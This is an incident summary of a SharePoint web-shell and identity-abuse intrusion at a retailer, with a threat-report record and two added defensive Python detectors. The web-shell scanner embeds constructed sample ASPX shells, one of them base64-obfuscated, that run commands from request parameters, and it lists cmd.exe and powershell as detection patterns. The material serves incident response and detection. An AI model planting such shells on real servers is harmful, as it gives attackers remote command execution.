A retail company was hit by a sophisticated, multi-stage cyberattack that combined unpatched SharePoint vulnerabilities (CVE-2025-49706, an identity-spoofing flaw, and CVE-2025-49704, remote code execution) with compromised identities. The first case began with a malicious ASPX web shell on the SharePoint server, surfaced by a Microsoft Defender Experts alert titled "Possible web shell installation", which gave the attackers remote code execution and the ability to spoof identities. In a separate but related case, the attackers used a compromised identity to abuse self-service password reset, mapped the organization's identity structure through Microsoft Entra ID and the Microsoft Graph API, and escalated access over Azure Virtual Desktop and RDP using PsExec and SQL Server Management Studio. They kept persistence with Teleport, Azure CLI and the Rsocx proxy, and Entra ID risk events confirmed the credential manipulation. The intrusions disrupted operations, exposed privileged accounts to lateral movement (9 of 20 accounts held elevated access without proper tiering), and left the company open to data exfiltration and ransomware deployment (ransomware targeting ESXi directories was found during reverse engineering). Microsoft's Detection and Response Team (DART) contained the threat, revoked compromised credentials and tokens, and enforced Zero Trust controls, but the incident exposed critical gaps in patching, identity segmentation and real-time detection that had left the organization vulnerable to systemic compromise and operational outages.
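The foothold in the first case was an ASPX file dropped on the SharePoint server, and the report notes that custom obfuscated web shells slipped past basic detection. Below is an added example of the kind of file-integrity plus content check a responder would run over the LAYOUTS directory; it is not code from the page or from Microsoft's report. It assumes a pre-incident hash baseline of the directory and scores each page on indicators that survive two common obfuscations: string-literal splitting ("Pro" + "cess") and base64-wrapped payloads, which it decodes and rescans. The directory, file names, baseline and sample pages are all constructed inline.

```python
"""Heuristic scan of a SharePoint LAYOUTS directory for new, modified or obfuscated
ASPX pages. Added example, not code from the page or from Microsoft's report; the
directory, the file names and the baseline hashes are all constructed below."""
import base64
import hashlib
import os
import re
import tempfile

# APIs a legitimate layout page almost never needs and a web shell nearly always does.
SUSPICIOUS_APIS = [
    r"Process\.Start", r"ProcessStartInfo", r"Assembly\.Load", r"System\.Reflection",
    r"Convert\.FromBase64String", r"Request\.(Form|QueryString|Headers|Cookies)",
    r'Request\["', r"cmd\.exe", r"powershell",
]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64-looking runs
STRING_CONCAT = re.compile(r'"\s*\+\s*"')           # "Pro" + "cess" -> "Process"
SUSPICIOUS_AT = 3                                    # score at which a page is escalated


def verdict(finding):
    if finding["score"] >= SUSPICIOUS_AT:
        return "suspicious"
    return "benign" if finding["status"] == "baseline" else "review"


def decoded_blobs(text):
    """Yield (blob, decoded text) for base64 runs; the real payload usually hides in one."""
    for m in B64_RUN.finditer(text):
        try:
            yield m.group(0), base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):    # not base64, or not text (e.g. a DLL)
            continue


def score_source(src, depth=0):
    """Score page source: fold split string literals, then rescan any decoded payload."""
    folded = STRING_CONCAT.sub("", src)
    score, reasons = 0, []
    for pat in SUSPICIOUS_APIS:
        if re.search(pat, folded, re.IGNORECASE):
            score += 1
            reasons.append(f"api:{pat}")
    for blob, decoded in decoded_blobs(folded):
        score += 1
        reasons.append(f"base64 blob of {len(blob)} chars")
        if depth < 2:                                # follow nested encoding, but not forever
            inner_score, inner_reasons = score_source(decoded, depth + 1)
            score += inner_score
            reasons += [f"decoded:{r}" for r in inner_reasons]
    return score, reasons


def scan_directory(layouts_dir, baseline):
    """Compare every .aspx with the pre-incident hash baseline, then score its source."""
    findings = []
    for name in sorted(os.listdir(layouts_dir)):
        if not name.lower().endswith(".aspx"):
            continue
        with open(os.path.join(layouts_dir, name), "rb") as fh:
            raw = fh.read()
        digest = hashlib.sha256(raw).hexdigest()
        status = "new" if name not in baseline else "modified" if baseline[name] != digest else "baseline"
        score, reasons = score_source(raw.decode("utf-8", "replace"))
        if status != "baseline":                     # a changed page is itself a signal
            score += 2
            reasons.append(f"{status} since baseline")
        findings.append({"name": name, "status": status, "score": score, "reasons": reasons})
    return findings


# Constructed sample pages. The hidden payload is encoded at build time, as an attacker
# would do it, so none of its plain-text indicators appear in update.aspx itself.
BENIGN_PAGE = ('<%@ Page Language="C#" %>\n<html><body>'
               '<asp:Label ID="lbl" runat="server" Text="Store locator" /></body></html>\n')
PLAIN_SHELL = ('<%@ Page Language="C#" %>\n'
               '<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>\n')
HIDDEN_PAYLOAD = ('System.Reflection.Assembly.Load(Convert.FromBase64String('
                  'Request.Form["d"])).GetType("R").GetMethod("Run").Invoke(null, null);')
OBFUSCATED_SHELL = ('<%@ Page Language="C#" %>\n<% string t = "Sys" + "tem.Refl" + "ection"; '
                    'string b = "' + base64.b64encode(HIDDEN_PAYLOAD.encode()).decode() + '"; %>\n')
APPENDED_SHELL = BENIGN_PAGE + '<% System.Diagnostics.Process.Start(Request.Form["x"]); %>\n'


def build_demo():
    """Write the post-intrusion directory; the baseline covers only the two original pages."""
    layouts = tempfile.mkdtemp(prefix="LAYOUTS_")
    baseline = {n: hashlib.sha256(BENIGN_PAGE.encode()).hexdigest()
                for n in ("default_footer.aspx", "site_footer.aspx")}
    after = {"default_footer.aspx": BENIGN_PAGE, "site_footer.aspx": APPENDED_SHELL,
             "helper.aspx": PLAIN_SHELL, "update.aspx": OBFUSCATED_SHELL}
    for name, body in after.items():
        with open(os.path.join(layouts, name), "wb") as fh:
            fh.write(body.encode())
    return layouts, baseline


def run_demo():
    return scan_directory(*build_demo())
```

Running `run_demo()` flags `helper.aspx` (new, plain shell), `site_footer.aspx` (a baseline page with a one-line shell appended, caught by the hash mismatch plus its API hits) and `update.aspx`, whose indicators only appear after the folded `System.Reflection` literal and the decoded base64 payload are scored; the untouched `default_footer.aspx` stays benign. A baseline hash list is the cheap part; the rescan of decoded content is what keeps a scanner like this useful once the obvious strings are hidden.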
TPRM report: https://www.rankiteo.com/company/university-of-arizona-bookstores
"id": "uni1402314092525",
"linkid": "university-of-arizona-bookstores",
"type": "Cyber Attack",
"date": "6/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': 'Retail', 'type': 'Retail Organization'}],
'attack_vector': ['Exploitation of Unpatched Vulnerabilities (CVE-2025-49706, '
'CVE-2025-49704)',
'Compromised Identities',
'Self-Service Password Reset Abuse',
'Microsoft Entra ID and Graph API Exploitation',
'Azure Virtual Desktop and RDP Misuse',
'Custom Obfuscated Web Shells'],
'customer_advisories': ['Download the full DART report for detailed insights '
'and protection strategies.',
'Attend Microsoft Secure (September 30) and Microsoft '
'Ignite (November 17–21) for AI-first security '
'solutions.'],
'description': 'A retail organization detected a major persistent cyberthreat '
"through a Microsoft Defender Experts alert titled 'Possible "
"web shell installation.' The investigation revealed a "
'malicious ASPX file on their SharePoint server linked to '
'vulnerabilities CVE-2025-49706 and CVE-2025-49704, allowing '
'cyberattackers to spoof identities and inject remote code. In '
'a separate but related incident (Reactive 2), attackers '
'exploited a compromised identity, abused self-service '
'password reset features, and mapped the organization’s '
'identity structure using Microsoft Entra ID and Microsoft '
'Graph API. The attackers escalated access via Azure Virtual '
'Desktop and RDP, deployed tools like PsExec and SQL Server '
'Management Studio, and maintained persistence using Teleport, '
'Azure CLI, and Rsocx proxy. Microsoft’s Detection and '
'Response Team (DART) intervened to contain the threat, '
'reclaim identity systems, and neutralize attacker access '
'through measures like Active Directory takeback, Entra ID '
'isolation, and revoking compromised tokens. Custom obfuscated '
'web shells bypassed basic detection, underscoring the need '
'for behavioral analytics.',
'impact': {'brand_reputation_impact': 'High (Given the sophisticated and '
'persistent nature of the attack, '
'likely erosion of trust)',
'identity_theft_risk': 'High (Credential manipulation and '
'directory exploration confirmed)',
'operational_impact': 'Significant (Lateral movement, persistence, '
'and potential operational disruption in '
'retail environment)',
'systems_affected': ['SharePoint Server',
'Microsoft Entra ID',
'Azure Virtual Desktop',
'RDP',
'SQL Server',
'Active Directory']},
'initial_access_broker': {'backdoors_established': ['Teleport',
'Rsocx Proxy',
'Custom Web Shells'],
'entry_point': ['Exploited SharePoint '
'Vulnerabilities (CVE-2025-49706, '
'CVE-2025-49704)',
'Compromised Identity via '
'Self-Service Password Reset Abuse'],
'high_value_targets': ['Microsoft Entra ID',
'Azure Virtual Desktop',
'Active Directory',
'ESXi Directories']},
'investigation_status': 'Completed (By Microsoft DART)',
'lessons_learned': ['Prompt patching of known exploited vulnerabilities '
'(e.g., SharePoint) is critical.',
'Identity segmentation and least privileged access '
'principles reduce lateral movement risk (9/20 accounts '
'had elevated access without proper tiering).',
'Behavioral analytics are essential to detect custom '
'obfuscated web shells and evolving tactics.',
'Real-time detection and response are vital due to the '
"speed of 'hands-on keyboard' attacker behavior.",
'Centralized logging, threat intelligence, and evidence '
'preservation strengthen incident response.',
'Regular vulnerability scans and EDR deployment across '
'all devices mitigate exposure.'],
'post_incident_analysis': {'corrective_actions': ['Patching vulnerable '
'systems and enforcing Zero '
'Trust principles.',
'Mass password reset with '
'identity re-attestation.',
'Deprivileging accounts and '
'revoking compromised '
'tokens.',
'Enhancing monitoring with '
'behavioral analytics and '
'threat intelligence.',
'Implementing MFA and least '
'privileged access '
'controls.'],
'root_causes': ['Unpatched SharePoint '
'vulnerabilities (CVE-2025-49706, '
'CVE-2025-49704).',
'Weak identity management (lack of '
'separation between standard and '
'privileged users).',
'Abuse of self-service password '
'reset features.',
'Insufficient detection '
'capabilities for obfuscated web '
'shells.']},
'ransomware': {'data_encryption': 'Targeted Attacks on ESXi Directories '
'(Observed During Reverse Engineering)'},
'recommendations': ['Deploy Endpoint Detection and Response (EDR) across all '
'devices.',
'Conduct regular vulnerability scans and patch known '
'vulnerabilities promptly.',
'Strengthen identity and access controls (e.g., enforce '
'MFA, remove inactive credentials, apply least privileged '
'access).',
'Implement centralized logging and threat intelligence '
'integration.',
'Preserve evidence and maintain a robust incident '
'response plan.',
'Monitor for behavioral anomalies, suspicious processes, '
'and malware indicators.',
'Segment identities to separate standard and privileged '
'users.',
'Adopt Zero Trust principles (e.g., MFA enforcement, '
'continuous authentication).',
'Engage expert support (e.g., Microsoft DART) for '
'forensic analysis and threat eviction.'],
'references': [{'source': 'Microsoft Security Blog – Cyberattack Series '
'(Retail Cases)'},
{'source': 'Retail Cybersecurity Statistics: Market Data '
'Report 2025'},
{'source': 'Microsoft DART Full Report (Reactive 1 and '
'Reactive 2 Cases)'}],
'response': {'containment_measures': ['Active Directory Takeback',
'Entra ID Isolation',
'Deprivileging Compromised Accounts',
'Token Revocation',
'Removal of Malicious Web Shells '
'(within hours)',
'Neutralization of Persistence '
'Mechanisms (e.g., Teleport, MFA device '
'registration)'],
'enhanced_monitoring': 'Yes (Behavioral Analytics for Detecting '
'Obfuscated Web Shells and Rapidly '
'Evolving Tactics)',
'incident_response_plan_activated': 'Yes (Microsoft DART engaged '
'swiftly)',
'recovery_measures': ['Deployment of Proprietary Forensic Tools '
'for Root Cause Analysis',
'Operational Recovery Guidance',
'Threat Intelligence Integration from '
'Defender and Microsoft Sentinel'],
'remediation_measures': ['Patching Vulnerable Systems '
'(SharePoint, etc.)',
'Phased Mass Password Reset with User '
'Identity Re-attestation',
'Security Configuration Enhancements '
'Aligned with Zero Trust (e.g., MFA '
'Enforcement)',
'Reverse Engineering of Ransomware for '
'Mitigation Strategies'],
'third_party_assistance': 'Yes (Microsoft DART provided forensic '
'insights and actionable guidance)'},
'title': 'Major Persistent Cyberthreat Exploiting Unpatched SharePoint '
'Vulnerabilities and Compromised Identities in Retail Sector',
'type': ['Cyber Espionage',
'Persistence',
'Identity Compromise',
'Web Shell Attack',
'Lateral Movement'],
'vulnerability_exploited': ['CVE-2025-49706',
'CVE-2025-49704',
'Weak Identity Management (Lack of Privileged '
'Account Separation)',
'Unsecured Self-Service Password Reset']}
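The second case in the description (self-service password reset abuse, MFA device registration as a persistence mechanism, and directory mapping through Microsoft Graph) is a sequence rather than a single event, which is why the lessons learned call for behavioral analytics over point alerts. The detector below is an added example, not code from the page or from Microsoft's report. It anchors on each self-service reset and looks for the follow-on stages within a time window, and it also reports addresses not seen in the account's prior sign-in history. The event records, users, IP addresses and the `KNOWN_IPS` history are constructed, and the field names are simplified and only loosely modelled on Entra ID audit logs and Microsoft Graph activity logs.

```python
"""Chain detector for the identity-abuse sequence in the case above: self-service
password reset, a new MFA method registered on the same account, then directory
enumeration through Microsoft Graph, all inside a short window. Added example, not
from the page or Microsoft's report; records, users and IPs are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

MIN_DISTINCT_ENUM_PATHS = 3       # one /users call is routine; a sweep across objects is not
ENUM_PREFIXES = ("/users", "/groups", "/directoryRoles", "/roleManagement",
                 "/applications", "/servicePrincipals")


def _audit(ts, activity, user, ip):   # simplified Entra ID audit record (constructed)
    return {"ts": ts, "kind": "audit", "activity": activity, "actor": user, "target": user, "ip": ip}


def _graph(ts, uri, user, ip):        # simplified Graph activity record (constructed)
    return {"ts": ts, "kind": "graph", "method": "GET", "uri": uri, "actor": user, "ip": ip}


A, B, C, D = ("alice@contoso.example", "bob@contoso.example",
              "carol@contoso.example", "dave@contoso.example")
EXT, CORP = "203.0.113.7", "198.51.100.10"        # RFC 5737 test addresses
SAMPLE_EVENTS = [
    # alice: the chain from the case, compressed into twenty minutes from one external IP
    _audit("2025-06-03T08:02:00Z", "Reset password (self-service)", A, EXT),
    _audit("2025-06-03T08:05:00Z", "User registered security info", A, EXT),
    _graph("2025-06-03T08:10:00Z", "/v1.0/users?$top=999", A, EXT),
    _graph("2025-06-03T08:12:00Z", "/v1.0/groups", A, EXT),
    _graph("2025-06-03T08:14:00Z", "/v1.0/directoryRoles", A, EXT),
    _graph("2025-06-03T08:20:00Z", "/v1.0/roleManagement/directory/roleAssignments", A, EXT),
    # bob: a legitimate reset followed by ordinary activity
    _audit("2025-06-01T09:00:00Z", "Reset password (self-service)", B, CORP),
    _graph("2025-06-01T09:30:00Z", "/v1.0/me", B, CORP),
    # carol: an admin's routine directory reads with no reset behind them
    _graph("2025-06-02T10:00:00Z", "/v1.0/users", C, CORP),
    _graph("2025-06-02T10:01:00Z", "/v1.0/groups", C, CORP),
    _graph("2025-06-02T10:02:00Z", "/v1.0/directoryRoles", C, CORP),
    # dave: reset and MFA registration three days apart, outside the window
    _audit("2025-06-01T12:00:00Z", "Reset password (self-service)", D, CORP),
    _audit("2025-06-04T12:00:00Z", "User registered security info", D, CORP),
]
KNOWN_IPS = {u: {CORP} for u in (A, B, C, D)}   # constructed 30-day sign-in history


def parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def graph_path(uri):
    """Strip the API version and query string so /v1.0/users?$top=999 counts as /users."""
    path = uri.split("?", 1)[0]
    for version in ("/v1.0", "/beta"):
        if path.startswith(version):
            path = path[len(version):]
    return path


def classify(ev):
    """Map a raw record to a chain stage, or None if it is not interesting."""
    if ev["kind"] == "audit":
        return {"Reset password (self-service)": "sspr_reset",
                "User registered security info": "mfa_registered"}.get(ev["activity"])
    if ev["kind"] == "graph" and ev["method"] == "GET" and graph_path(ev["uri"]).startswith(ENUM_PREFIXES):
        return "directory_enum"
    return None


def detect_chains(events, window_minutes=24 * 60):
    """Anchor on each self-service reset and look for the later stages within the window."""
    window = timedelta(minutes=window_minutes)
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: parse_ts(e["ts"])):
        stage = classify(ev)
        if stage:
            by_user[ev.get("target", ev["actor"])].append((parse_ts(ev["ts"]), stage, ev))
    alerts = []
    for user, seq in by_user.items():
        for i, (t0, stage, anchor) in enumerate(seq):
            if stage != "sspr_reset":
                continue
            follow = [(s, e) for t, s, e in seq[i + 1:] if t - t0 <= window]
            stages = ["sspr_reset"]
            if any(s == "mfa_registered" for s, _ in follow):
                stages.append("mfa_registered")
            enum_paths = sorted({graph_path(e["uri"]) for s, e in follow if s == "directory_enum"})
            if len(enum_paths) >= MIN_DISTINCT_ENUM_PATHS:
                stages.append("directory_enum")
            if len(stages) < 2:               # a lone reset is normal helpdesk traffic
                continue
            ips = {anchor["ip"]} | {e["ip"] for _, e in follow}
            alerts.append({
                "user": user, "first_seen": anchor["ts"], "stages": stages,
                "enum_paths": enum_paths, "unfamiliar_ips": sorted(ips - KNOWN_IPS.get(user, set())),
                "severity": "high" if len(stages) == 3 else "medium",
            })
    return alerts
```

`detect_chains(SAMPLE_EVENTS)` raises one high-severity alert for alice with all three stages, four distinct enumeration paths and the unfamiliar address 203.0.113.7; bob's reset, carol's routine reads and dave's out-of-window registration produce nothing. Shrinking the window to a few minutes drops alice to a medium alert with only the reset and MFA registration, which is the trade-off to tune against your own reset and registration volumes.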